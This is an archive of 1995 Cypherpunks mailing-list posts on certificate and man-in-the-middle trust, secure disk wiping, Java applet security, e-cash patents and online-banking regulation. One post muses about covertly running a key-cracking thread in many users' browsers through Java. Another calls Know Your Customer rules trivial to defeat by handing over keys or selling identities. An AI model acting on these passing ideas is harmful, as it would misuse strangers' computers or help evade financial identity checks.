>is that they (in this case the "they" identified by their key) are doing
>business
>dealings with a lot of people and it's more profitable not to abscond.
>And the reason you know it's really the Bank and not MITM is that they've
>always identified themselves by their key from the beginning.
>Just like the credit card who's owner we've been calling Alice has.
>And because you've successfully withdrawn money from the Bank before,
>and because you're clearing Alice's credit card transaction reasonably promptly.

What if you are accessing the bank via a MITM?  Consider this example:
Alice writes you a check, signed with a key (without her name) which
has a credential from the bank saying that it will back up the check.
But you need the bank's key to check the credential, so Alice gives it
to you, or you get it from a public cache.  Suppose the bank's key is
fake, and Alice is defrauding you.  How do you tell?  Wouldn't a
certificate on the bank's key be necessary, one which ties the bank's
name and reputation to the key?

Or what if the bank really is and has always been behind a MITM?  You say
that it is more profitable for the bank not to abscond with your money.
What about the MITM?  He doesn't make any profits until he cheats.  He
might well be collecting information which will allow him at some point
to abscond very successfully.  Would you really trust a bank which was
known to you only by a key and by a record of never having defaulted,
knowing this was a possibility?

>Checks and credit cards are especially good examples for this - the current
>systems need your name on them, because your name and signature are the
>closest they have to an authentication system.  However, with digital
>signatures,
>the fact that you can sign a document verifiable by the public key is
>all the authentication that's needed; your name isn't.  If the card has an
>account number for convenience, and Alice substitutes Carol's account number
>for hers on a statement, her signature won't match the public key the bank
>wants on the request, and it'll bounce.  (In this case, the certificate
>from the bank would probably include the account number as well as the key,
>but it's not critical for on-line systems, just more efficient.)

Same problem as before: how does the credit card company know that the
key it is putting on the card is really Alice's?  What if Alice discovers
unauthorized charges because Carol was a MITM and substituted her key?
We can't just ignore this possibility.

It seems to me that a lot of protocols assume the existence of secure
channels.  Yet the MITM attack shows that public key cryptography does
not in and of itself provide a secure channel.  This is a problem which
IMO should not be ignored simply because it is inconvenient.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Tue, 10 Oct 95 06:02:00 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: PC disk wipe software - SUPERWIPE 1.04R
Message-ID: <199510101300.JAA17982@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 1995.10.10 -0500, Gary Jeffers wrote:
>   As for the problem of getting rid of old buffer data writes to the end
>of last file cluster writes, my program doesn't handle that. However, if
>there is no disk compressor, I don't think it would be that hard to write
>a function to handle it. In reality, I don't think that this problem is
>much of a problem anyway. It would only occur at the end of small files.

Thanks for the post.  Just a thought: there is dead space at the end of
virtually all files, not just small ones.  On average, half a cluster is
wasted at the end of any given file.  Only files that happen to be an exact
multiple of the cluster size won't have wasted bytes (on my main drive, with
a cluster size of 16K, on average about one file out of 16,000+ wouldn't
have any wasted space).

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:22:07 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <199510101620.JAA20087@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Smart <smart@mel.dit.csiro.au> writes:

> >  Hence the problem has no solution and we should not
> > waste much time on it.

>Exactly. If a public key ONLY has an existence in cyberspace (as per
>Pr0duct Cipher) then it is impossible to prove that they aren't
>surrounded by a MITM cloud which is also seeing everything they
>see without them knowing it.

Well, I don't think this is true.  First of all, the MITM has limited
powers.  He may be able to perform certain automated and occasionally manual
replacements on messages, but he is not able to affect communications
which take place off of the net.  In particular, he is not able to stop
Pr0duct Cipher from reading Verisign's key fingerprint in the newspaper
and comparing it with his own copy of the key.  And if PC has a valid
Verisign key then he can know that he has a valid key for other people.
If he then sends mail to those people using their keys, the MITM cannot
control that mail.  Hence PC can communicate securely with other people
even if the MITM controls all of his network communication, contrary to
the claims of impossibility.

>It is important to be aware of this. However the importance is
>perhaps mitigated by the following considerations:

>1. Surrounding someone with such an MITM cloud is so hard as to
>   be impossible for practical purposes. This will be more true
>   if the person trying to establish a cyberspace identity can
>   prove that they move around physically and use different service
>   providers at different times [but then again perhaps if you
>   do that you cease to be a purely cyberspace entity].

If only one ISP is used (which is true for the vast majority of people)
and if they only get and send keys in specific ways then I would not say
it is impossible.  Look at programs like Satan or the internet worm.
They contain many different possible attacks.  Writing such programs is
almost an exercise in tedium as much as creativity.  In the same way it
would be possible for a filter program to anticipate a dozen or more
different ways in which a user might get keys from the net, and make
substitutions.  Doing it for any given method is not that hard, so it is
just a matter of motivation to do it for 99% of the ways people will
use.

>2. If the other end of the communication is a purely cyberspace
>   entity then you can't possibly establish the sort of relationship
>   which would enduce you to send them anything really secret. The
>   possibility that there might be a baddy playing MITM is 
>   infinitesimal compared to the probability that the other end
>   is itself a baddy.

Not necessarily.  As I argued before, we do establish trust relationships
in the real world.  And we do that on the basis of communication.  Yes,
in real life there are wider communication channels, nonverbal ways of
judging the sincerity of others.  But over time I would guess that online
relationships can take on the same character.  In fact, I have read
countless puff pieces about friendships, even romances, formed online.
The notion that you can't possibly establish the sort of relationships
online which would induce you to share secrets is demonstrably false, at
least for many people.

>The time you will want to deal with a cyberspace entity is where
>you are taking no risks and they are taking all the risks.
>This will hopefully be the case when we are a seller and they are
>the buyer. As long as we get the digital cash we don't care who
>they are.

That's an awfully limited way of looking at things.  We do a lot more
online than buy and sell.

>Apart from that we will always want some certificate that links the
>public key to something in the real world. The point of the
>key-centric approach is that that doesn't have to be a name or
>something that contains a name. If we want to make sure the key
>belongs to the person you were talking to last night then maybe you'd
>like some biometric data: "five foot two, eyes of blue,...". And
>of course the certificate is useless unless it is signed by a key
>that we trust for that purpose.

No, I don't think this is at all useful.  The VAST majority of people I
talk to on the net are people I have never met.  What earthly use is a
credential that key so-and-so belongs to a person with blond hair, in
helping me to establish secure communications?  Should we only talk
online to the miserable few people we live near who share our interests?
The net is global!  Virtual communities allow niche interests (like ours)
to attract people from all over the world.  Any scheme which requires
face to face meetings between every pair of participants is doomed.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 10 Oct 95 09:23:40 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510101332.AA24407@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951010091919.20099A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Rich Salz wrote:

> 
> Oh, you mean like a mirror or local cache?  (Sure, Rocky, never happen...)

Mirroring, where the url used to access the data is not that used for the 
original, could be a problem; caches that aren't mirrors and which keep 
the original URL are ok. Whether mirroring is a problem in general is a 
different subject.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 06:35:00 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <9510101332.AA24407@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Java applets can't read /etc/passwd, and can't issue NIS requests unless 
> they were downloaded from an HTTP server running on the NIS server 

Oh, you mean like a mirror or local cache?  (Sure, Rocky, never happen...)

> (actually, they can't do UDP at the moment, so that's out as well)

Even with TIRPC NIS is still UDP-only?  Has NIS+ fixed this?
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:39:02 PDT
To: cypherpunks@toad.com
Subject: Re: Chaum's patents
In-Reply-To: <Pine.3.89.9510091650.A96856-0100000@aix2.uottawa.ca>
Message-ID: <199510101637.JAA22634@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:

>Sorry if this has been stated before, but exactly when do Chaum's first
>set up e-cash related patents expire? I looked it up in applied crypto
>the last time I had my hands on it and couldn't find the dates. 

>How many (and what) patents are there in this field anyway? (don't bother 
>with that if it's too long to answer)

I did a patent search a few months ago, with results at <URL:
http://www.portal.com/~hfinney/chaum_patents.html>.  Chaum has several
patents; my lists doesn't have all of them.  The ones I have are dated
1988 and 1990.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 10 Oct 95 09:39:04 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <v02120d03aca05dde70fb@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero wrote:
>In my previous message, I left out some fundamental parts of the run-time
>that need to be looked at carefully. The garbage collection needs to be
>examined carefully. Normally GC algorithms are formally derived, so it's
>the implementation that needs to be checked for. holes in the GC may be
>too unpredictable to exploit for anything but core-dumping, especially since
>java uses a mark-sweep conservative collector.
>

FWIW, we had some ideas about how to attack the GC from untrusted code,
involving resurrection of objects during finalization. This turned out
not to work -- the Javoids apparently anticipated this problem in their
design.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 06:46:03 PDT
To: cypherpunks@toad.com
Subject: Re: java security & the cypherpunk agenda
Message-ID: <9510101342.AA24492@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From what I have seen of the CV's of the Java team (at least those
who have/had home pages on the various Sun java servers), none of
them were particularly security-aware.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 07:52:27 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <9510101450.AA28558@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
 > 	If a MITM attack would be useful, then there will be times
 > when one will be mounted.  It might take 30 law enforcement officers
 > to do it, but it has been demonstrated that the FBI will use that many
 > people for a year or more on some cases.  The CIA and NSA can be
 > presumed to be willing to spend more time and effort to get certain
 > results.

Right; if there's that much energy being expended, then I have no
reason to trust that just because the Department of Keys tells me that
a particular key belongs to one "Alice B. Crypto" it's really the same
Alice I think I know.  I'll make sure that we verify our keys in
person.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 10 Oct 95 06:59:31 PDT
To: cypherpunks@toad.com
Subject: Java idea
Message-ID: <9510101354.AA05988@outland>
MIME-Version: 1.0
Content-Type: text/plain



Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
distributions :) has anyone given any thought to using Java to do some
sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
night and it could be feasable.  If you could get your key cruncher
thread loaded into a good many browsers to run when idle . . . .  How
many estimated copies of NS are there?  Anyone want to do the math? :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Mon, 9 Oct 95 17:02:51 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510092316.QAA09588@jobe.shell.portal.com>
Message-ID: <199510100002.AA01774@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


 >  Hence the problem has no solution and we should not
 > waste much time on it.

Exactly. If a public key ONLY has an existence in cyberspace (as per
Pr0duct Cipher) then it is impossible to prove that they aren't
surrounded by a MITM cloud which is also seeing everything they
see without them knowing it.

It is important to be aware of this. However the importance is
perhaps mitigated by the following considerations:

1. Surrounding someone with such an MITM cloud is so hard as to
   be impossible for practical purposes. This will be more true
   if the person trying to establish a cyberspace identity can
   prove that they move around physically and use different service
   providers at different times [but then again perhaps if you
   do that you cease to be a purely cyberspace entity].

2. If the other end of the communication is a purely cyberspace
   entity then you can't possibly establish the sort of relationship
   which would enduce you to send them anything really secret. The
   possibility that there might be a baddy playing MITM is 
   infinitesimal compared to the probability that the other end
   is itself a baddy.

The time you will want to deal with a cyberspace entity is where
you are taking no risks and they are taking all the risks.
This will hopefully be the case when we are a seller and they are
the buyer. As long as we get the digital cash we don't care who
they are.

Apart from that we will always want some certificate that links the
public key to something in the real world. The point of the
key-centric approach is that that doesn't have to be a name or
something that contains a name. If we want to make sure the key
belongs to the person you were talking to last night then maybe you'd
like some biometric data: "five foot two, eyes of blue,...". And
of course the certificate is useless unless it is signed by a key
that we trust for that purpose.

Bob Smart

P.S. I hope my earlier posting were not interpreted as being critical
of the IPSEC effort. I strongly support it. It would be silly to
go to them and say "hold everything I think we need a whole new
security architecture". That is something for the future that we
are only just starting to think about. However I think the IPSEC
work confirms the difficulties of the current "name first then
key" approach. Whenever it is incorporated in any protocol from
network layer to application it makes the protocol at least twice
as complex and at least twice as hard to manage.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 10 Oct 95 07:45:25 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510101408.AA00668@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.

The point is, strong privacy is readily AVAILABLE even under those
circumstances.  If tribal elders tried to prohibit people from
wandering out of earshot, then you'd have an analogy.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHp+DV11Wd4tm8clAQHaCQP+Mi9Fno90Jj4wwaQm9M1TBUsjQENT94s1
ghHSmSSseF/UI0ReD0NoP7vBIqsieZsIS/nCgAasU4BBzAhqdn0PPu3FJayr3IBx
ZUsOkzh2VCcmy0Av/zvDpCxp5xPrcJnIdhSqUxVz68J/L8eESuSrKf3tE5xsrUNK
VW9Z5WytXWU=
=g5YE
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 07:12:28 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Conference Summary, Part the First
Message-ID: <199510101411.KAA01820@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 10/8/95 -0800, Douglas Barnes wrote:

>  o Regulators are not amused by attempts to run unlicensed online
>    banks. They are aware such things are starting to pop up, and
>    they are very interested in shutting them down when they do.

The jurisdictional problems are going to be very interesting.  As with
gambling.  Nations are reluctant to extradite their nationals for acts that
are not crimes at home.  The US follows this practice just like everyone
else.  Witness the lack of success of the German government in extraditing
neo-nazis from the US.  They had to grab one in Europe.

>  o The same goes for NBFIs (Non-bank financial institutions) --
>    these appear to be regulated primarily at the state level, with
>    some IRS and FinCEN involvement. These include everyone from
>    stock brokers to Casas de Cambio.

This is the real problem for the Feds.  When everyone is a non-bank
financial institution...

>  o The attendees displayed an understanding of the situation wrt
>    electronic payment systems that ran from dim to non-existent. 

Hard to control what you don't know.

>  o Fewer formal, specific or deterministic rules for reporting
>    suspicious transactions.
>
>  o More vague, subjective, and privacy-invading rules for
>    reporting suspicious transactions, coupled with more severe
>    penalties for banks and NBFIs.

But unlicensed NBFIs don't have licenses to pull so regulation is tricky.
An unlicensed NBFI includes any institution in another jurisdiction (no *US*
license) and any person running Quicken version 9.0 that will no doubt
support exotic electronic payment systems.

>  o Banks are now considered "deputies" of the federal government
>    in the War On Money Laundering.

Generals are always fighting the last war.  Banks are history particularly
if they are unable to offer competitive services because of regulatory
restrictions.

>  o Banks must implement strict "Know Your Customer" policies.

Which are trivial to defeat particularly under an EPS system when the
customer hands his keys over to his actual principal.

Note:  I've often wondered why the rulers place so much faith in their
ability to identify people when those who have studied the Is A Person
problem have thrown their hands up.

"Homeless?  Want to make a few bucks?  You have a brilliant future in the
identity sales business.  Remember, you can sell your identity as many times
as you like.  It never wears out."

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:12:39 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <9510100110.AA25989@all.net>
Message-ID: <199510101415.KAA03219@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Frederick B. Cohen wrote:

| > For the general case this is true. To be able to trust larger systems, you
| > need to not only be able to trust the individual 2 pagers, but to also be
| > able to show that composing the sub units doesn't lose whatever property
| > you're trying to do.
| ...
| > Distributed co-operative theorem proving, anyone?
| 
| Let's go - I will provide the distribution mechanisms, and I think I
| know someone who is interested in the theorem proof side.  I know of
| several experts on theorum proving who may well pitch in.  What program
| do you want to prove secure next (we're currently finishing up my secure
| Web server).

	I'd be real intereseted in seeing an MTA proven secure.  Smail
or Zmailer perhaps?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 9 Oct 95 19:00:06 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <199510092317.AA44641@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I thought I'd ask here, since its related to a lot of the stuff people
>have written for the PC platform in these parts. I need to securely
>wipe a bunch of data from an MS-DOS hard drive, so that it can't be
>recovered. Are there any readily available utilities for this? Will
>any of them selectively erase only data that isn't allocated to
>existing files?

Archive data off to tape, low level format drive using the bios hd utils,
reformat drive, restore data. I find the non graphical AMI bios very useful
for this.

Doing anything else fails to remove the old data on partially used but valid
blocks.

Cheers,
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:20:09 PDT
To: smart@mel.dit.csiro.au (Bob Smart)
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <199510101422.KAA03235@homeport.org>
MIME-Version: 1.0
Content-Type: text



	"Never underestimate the effort your opponent will expend on
cryptanalysis."  -- Robert Morris, Sr., speaking at Crypto '95

	If a MITM attack would be useful, then there will be times
when one will be mounted.  It might take 30 law enforcement officers
to do it, but it has been demonstrated that the FBI will use that many
people for a year or more on some cases.  The CIA and NSA can be
presumed to be willing to spend more time and effort to get certain
results.

Bob Smart wrote:

| Exactly. If a public key ONLY has an existence in cyberspace (as per
| Pr0duct Cipher) then it is impossible to prove that they aren't
| surrounded by a MITM cloud which is also seeing everything they
| see without them knowing it.
| 
| It is important to be aware of this. However the importance is
| perhaps mitigated by the following considerations:
| 
| 1. Surrounding someone with such an MITM cloud is so hard as to
|    be impossible for practical purposes. This will be more true
|    if the person trying to establish a cyberspace identity can
|    prove that they move around physically and use different service
|    providers at different times [but then again perhaps if you

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:29:30 PDT
To: gmiller@grendel.ius.indiana.edu (Greg Miller)
Subject: Re: Java
In-Reply-To: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
Message-ID: <199510101432.KAA03416@homeport.org>
MIME-Version: 1.0
Content-Type: text



| 	I'd like to make this prediction:  someone at some point in time 
| will find another serious security hole in SendMail.
| 
| 	What you need to ask yourself is "Do the benefits of Java 
| outweigh the security risks?"

	A substantial risk that Java carries is that its 'secure'
label will get in through doors which should have remained closed to
it.  I would be worried about Java capable browsers in the Federal
Reserve, because people will say 'its nifty, its labeled secure, lets
use it.'

	I think there are some interesting liability models waiting to
be explored here.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjb@universe.digex.net (Scott Brickner)
Date: Tue, 10 Oct 95 08:33:35 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Certificate proposal
In-Reply-To: <9510101243.AA28296@alpha>
Message-ID: <9510101532.AA17835@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes
>
>Scott Brickner writes:
> > I disagree.  The MITM is foiled by one successful communication. 
>
>I'm going to need some clarification of this; what is meant by
>"successful"?  If you mean "a communication without a MITM
>participating", and presuming also that that communication would
>involve a key validation, then I suppose it's true.  However, I don't
>see how this success can be evaluated if the parties do not have
>nearly complete control over the communications substrate.

By "successful" I mean communicating without the MITM *interfering*.
Either the parties need to exchange a symmetric key without the MITM
eavesdropping, or exchange asymmetric keys without the MITM modifying
them.

The chance of failure is minimized by diversity in the channels used to
try to bypass the MITM.  The issue becomes one of risk management.  If
you can't afford a failure, you *do* need a channel over which you have
nearly complete control.  The simplest such channel is a physical
meeting, during which you exchange public keys.  If the MITM threat is
from your ISP, you are likely to bypass his control with the telephone
network.  Any single success is adequate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Tue, 10 Oct 95 07:43:40 PDT
To: cypherpunks@toad.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510101442.AA11568@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


A fine piece of work.  The ideas expressed in this paper should scare
the hell out of everyone who uses NFS for any serious applications,
which for a fact includes most banks and all investment banks and
brokage houses.  In this particular area I KNOW what is at risk.
Again, I congratulate the authors on a first-class effort.
 
cheers,
    paul

> From owner-cypherpunks@toad.com Tue Oct 10 03:15:15 1995
> From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
> To: cypherpunks@toad.com, bugtraq@crimelab.com
> Cc: gauthier@cs.Berkeley.EDU, brewer@cs.Berkeley.EDU, iang@cs.Berkeley.EDU,
>         daw@cs.Berkeley.EDU, fur@netscape.com
> Subject: Basic Flaws in Internet Security and Commerce
> Date: Mon, 09 Oct 1995 14:26:06 -0700
> Sender: owner-cypherpunks@toad.com
> Content-Length: 10235
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 07:47:09 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <199510101415.KAA03219@homeport.org>
Message-ID: <9510101444.AA04563@all.net>
MIME-Version: 1.0
Content-Type: text


...
> 	I'd be real intereseted in seeing an MTA proven secure.  Smail
> or Zmailer perhaps?

The problem is that such programs were not designed to be secure (as far
as I am aware) or to be proven secure, and thus, even with lots of
computing power, there is essentially no hope of doing this.  In fact,
they are almost certainly not secure (as these proofs generally help detect).

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Tue, 10 Oct 95 07:39:54 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510100721.AAA20944@ix.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951010104538.255B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Bill Stewart wrote:

> >There has been considerable discussion on the MCIP list about how most
> >*Mac* programs that purport to do this, like Burn, for example, leave stuff
> >over in disk blocks. My understanding is that this is not a trivial
> >problem, and it occurs in MUSH-DOS as well....
> 
> Doing it _right_ is not a trivial job.  Consider disk controllers that
> map out bad blocks so the OS never needs to see them - if you're trying
> to remove highly classified data, the fact that Diskwipe won't ever see them
> might be a serious problem, even if it is close enough for government work.

FYI the Justice Department requires degaussing a hard drive before it can 
be declared surplus ...

EBD


<deletia>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 10 Oct 95 07:57:36 PDT
To: cypherpunks@toad.com
Subject: Java=?
Message-ID: <9510101456.AA24338@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Being a newcomer to this list, and having read a lot of java-related messages 
without understanding them fully, could comeone explain to me exactly what 
java *is*?  Thanks for your time, ahead of time.

DMiskell@envirolink.org

---
_________________________________
*!Cheese Doctrine:!*
     Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________

"Oh $HI+, here comes a flock of pushers - 'Jungle Edition.'"
-Mortifer Nex, playing peek-a-boo in the trees

"If you've got the coordinance, we've got the ordinance to blow up the
 loved ones who blow you off!"
-Uncle Dan's Thermonuclear Explosives, Unlimited





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Oct 95 08:01:17 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: java security concerns
In-Reply-To: <9510101301.AA28597@alpha>
Message-ID: <199510101500.LAA02245@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
>  > I can
>  > physically remove all the "dangerous" calls from a Postscript
>  > interpreter and still have it be useful.
> 
> I don't see the difference.  An interpreter is an interpreter.

I suppose most of this is dead obvious to me because I work in
security every day, but it seems that some otherwise smart people don't
see the point I'm making, repeatedly.

As an exercise to the reader compare the following two tasks in
difficulty.

1) Find a bug that lets you execute arbitrary programs unintentionally
   from a program that contains instances of the 'fork()' system call.

2) Find a bug that lets you execute arbitrary programs unintentionally
   from a  program that contains *no* instances of the 'fork()' system call.

[hint: it is much harder to get a program to do something that it has
no code at all to do than to get it to do a buggy form of a something
it already does.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 08:06:59 PDT
To: cypherpunks@toad.com
Subject: William S. Powell in front of Congress Oct 11, 10:30 AM
Message-ID: <9510101504.AA05512@all.net>
MIME-Version: 1.0
Content-Type: text


William S.  Powell is the person who firs patented an electronic money
system (almost 15 years ago now), and he will be testafying before the
congressional subcommittee tomorrow - Oct.  11, 1995 at 10:30 AM
(scheduled).  If you really want to know about electronic cash and how
our society has treated it over the last 15 years, you might want to
watch this.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 08:11:25 PDT
To: cypherpunks@toad.com
Subject: Myth of the Powerless State
Message-ID: <199510101509.LAA16131@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Gentlemen:

Your leader entitled "The myth of the powerless state" (October 7th) made some valuable points about the continuing significance of state power in our lives but missed some very significant numbers.  

You state that public spending in the "big economies" has expanded from 36% to 40% of GDP since 1980.  But, if you take the world's economy as a whole, can you doubt that the percentage of Gross World Product (GWP) controlled by the world's states has declined since 1980.

Note the following significant changes.  1)  In both developed and underdeveloped countries, the "informal sector" has continued to grow.  You, yourself have reported that the poorest households in America spend twice their official income.  2)  The Soviet Union has gone from an almost 100% government-controlled economy to one which has a much smaller state sector.  Meanwhile informal and formal privatization in China, India, Britain, etc. have transferred vast assets to private control.  3)  The continued accumulation of offshore funds are effectively outside of the game and under no flag.  The amount of these funds is hard to estimate but has surely grown quite large.

The convergence of all of these factors suggests that, at some point in the late '80s or early '90s, the percentage of the GWP controlled by governments peaked and began to decline.  

As technology makes it easier for the financial services industry to carve its niches in the corridors of cyberspace, stateless financial assets seem sure to grow.  Since anyone can use powerful mathematics to create virtual spaces which even the largest government is powerless to enter, the percentage of GWP that the state even knows about much less controls will shrink.

Duncan Frissell 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Tue, 10 Oct 95 08:12:05 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: rise and fall...
Message-ID: <Pine.SUN.3.91.951010111036.434A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain





Some time ago on the list someone mentioned a book "Rise and Fall of the 
Nation State."

Can someone confirm author/title information for me?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





